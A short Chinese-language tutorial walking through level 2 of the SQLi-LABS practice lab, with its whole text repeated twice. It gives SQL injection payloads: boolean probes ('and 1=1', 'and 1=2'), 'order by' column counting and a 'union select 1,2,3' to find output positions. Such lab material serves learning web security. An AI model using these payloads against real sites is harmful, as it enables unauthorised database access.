最详细SQLi-LABS靶场 less-2教学
接下来我们来到第二关
同样我们用and1=1 ,and1=2来试一下
发现1=1时正常
1=2时出现报错
接下来和第一关一样我们就构造语句吧
?id=1 and 1=1 order by 3
?id=1 and 1=1 order by 4 报错
然后联合回显位置
?id=1 and 1=2 union select 1,2,3
然后接下来的查询什么的都套用第一关的就可以啦,不懂的可以回去看看
接下来我们来到第二关
同样我们用and1=1 ,and1=2来试一下
发现1=1时正常
1=2时出现报错
接下来和第一关一样我们就构造语句吧
?id=1 and 1=1 order by 3
?id=1 and 1=1 order by 4 报错
然后联合回显位置
?id=1 and 1=2 union select 1,2,3
然后接下来的查询什么的都套用第一关的就可以啦,不懂的可以回去看看